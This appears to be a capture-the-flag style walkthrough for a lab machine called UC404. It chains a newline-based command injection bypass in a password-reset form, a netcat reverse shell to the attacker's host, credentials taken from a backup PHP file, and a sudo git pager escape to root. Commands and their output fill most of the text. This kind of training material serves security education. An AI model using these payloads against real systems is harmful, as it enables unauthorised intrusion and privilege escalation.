Exploitation Guide for UC404

Summary

On this machine, we'll leverage OS command injection in a web application to gain an initial foothold. We'll then leverage a password disclosure and a sudo misconfiguration to escalate our privileges.

Enumeration

Nmap

We start the enumeration process with a simple Nmap scan.

kali@kali:~$ sudo nmap 192.168.120.157
Starting Nmap 7.91 ( <https://nmap.org> ) at 2020-10-22 13:13 EDT
Nmap scan report for 192.168.120.157
Host is up (0.035s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
2049/tcp open  nfs
3128/tcp open  squid-http

Gobuster

Navigating to port 80 (http://192.168.120.157/), we find an application named AdminLTE3. We can use gobuster to bruteforce the site's directories with the /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt wordlist.

kali@kali:~$ gobuster dir -u <http://192.168.120.157> -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -z
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
...
/docs (Status: 301)
/pages (Status: 301)
/demo (Status: 301)
/plugins (Status: 301)
/db (Status: 301)
/dist (Status: 301)
/build (Status: 301)
/LICENSE (Status: 200)
/under_construction (Status: 301)
...

This scan reveals a hidden /under_construction directory .

Web Enumeration

Navigating to the discovered directory, we find a login control and a Forgot Password? link. If we navigate there, we are presented with a form asking for an email address. The subtext reads:

By clicking "Reset Password" we will send a password reset link

Viewing the source code of the page reveals the following comment:

<!--
  ______ __  __          _____ _         _______     _______ _______ ______ __  __
 |  ____|  \\/  |   /\\   |_   _| |       / ____\\ \\   / / ____|__   __|  ____|  \\/  |
 | |__  | \\  / |  /  \\    | | | |      | (___  \\ \\_/ / (___    | |  | |__  | \\  / |
 |  __| | |\\/| | / /\\ \\   | | | |       \\___ \\  \\   / \\___ \\   | |  |  __| | |\\/| |
 | |____| |  | |/ ____ \\ _| |_| |____   ____) |  | |  ____) |  | |  | |____| |  | |
 |______|_|  |_/_/    \\_\\_____|______| |_____/   |_| |_____/   |_|  |______|_|  |_|

---- Under Construction ----

sendmail.php must receive the variable from the html form and send the message.

|| For security reasons we are working to blacklist some characters ||

//-->

Could not open input file: sendmail.php

The behavior of the page reveals that the code is executing commands by passing an argument to the sendmail.php page, which does not exist.

Exploitation

Command Injection

We'll set up our web browser to use the Burp proxy to intercept and analyze our traffic. Then, we'll test the functionality of this form by inputting [email protected] into the email field and submitting the form.

The body of the captured request contains email=test%40email.com. This seems like a good candidate for command injection. Let's include the variable email in a GET request and inject ; followed by the command id:

<http://192.168.120.157/under_construction/forgot.php?email=;id>

According to the server response, this doesn't seem to work. There's a possibility we used dangerous characters which were blacklisted. Researching OS command injection bypasses, we discover the %0a character. Let's test this with the following request:

<http://192.168.120.157/under_construction/forgot.php?email=%0aid>

The server response indicates that we have obtained remote code execution on the target.

HTTP/1.1 200 OK
Date: Thu, 22 Oct 2020 17:56:02 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Length: 2783
Connection: close
Content-Type: text/html; charset=UTF-8
...
Could not open input file: sendmail.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
0

Reverse Shell

A local command search lead us to the netcat command.

<http://192.168.120.157/under_construction/forgot.php?email=%0Awhich+nc>

...
/usr/bin/nc
...

We can easily obtain a reverse shell with netcat. Let's set up a listener on port 4444 and issue the following request (be sure to swap your IP address):

<http://192.168.120.157/under_construction/forgot.php?email=%0Anc%20192.168.118.3%204444%20-e%20%2Fbin%2Fbash>

This gives us a remote shell.

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.157: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.157] 47038
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@UC404:/var/www/html/under_construction$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@UC404:/var/www/html/under_construction$

Escalation

Local Enumeration

Exploring the file system, we discover an interesting file: /var/backups/sendmail.php.bak.

www-data@UC404:/var/www/html/under_construction$ cd /var/backups
cd /var/backups
www-data@UC404:/var/backups$ ls -la
ls -la
total 28
drwxr-xr-x  2 root     root      4096 Oct 23 07:38 .
drwxr-xr-x 12 root     root      4096 Oct 22 11:16 ..
-rw-r--r--  1 www-data www-data   787 Sep 18 10:21 sendmail.php.bak
www-data@UC404:/var/backups$

The contents include the following code, which includes hardcoded credentials:

www-data@UC404:/var/backups$ cat sendmail.php.bak
cat sendmail.php.bak
<?php
if(isset($_POST['submit']))
{
$connect=mysql_connect("localhost","brian","BrianIsOnTheAir789") or die("Could not connect to database");
mysql_select_db("uc404") or die(mysql_error());
...
?>www-data@UC404:/var/backups$

SSH

Let's verify these credentials with an SSH connection.

kali@kali:~$ ssh -o StrictHostKeyChecking=no [email protected]
...
brian@UC404:~$ id
uid=1001(brian) gid=1001(brian) groups=1001(brian)
brian@UC404:~$

Abusing Git Functionality

We can begin our escalation process with a search for commands with elevated privileges.

brian@UC404:~$ sudo -l
Matching Defaults entries for brian on UC404:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User brian may run the following commands on UC404:
    (ALL) NOPASSWD: /usr/bin/git
brian@UC404:~$

It appears we can run /usr/bin/git without a password. We can abuse this to get root shell. We'll start with the following command:

brian@UC404:~$ sudo git help config

This produces the following output:

GIT-CONFIG(1)                                         Git Manual                                         GIT-CONFIG(1)

NAME
       git-config - Get and set repository or global options

...

After running this, Manual page git-config(1) line 1 (press h for help or q to quit) will be highlighted. From here, we can escape this screen into a root shell with !/bin/sh followed by a return.

# id
uid=0(root) gid=0(root) groups=0(root)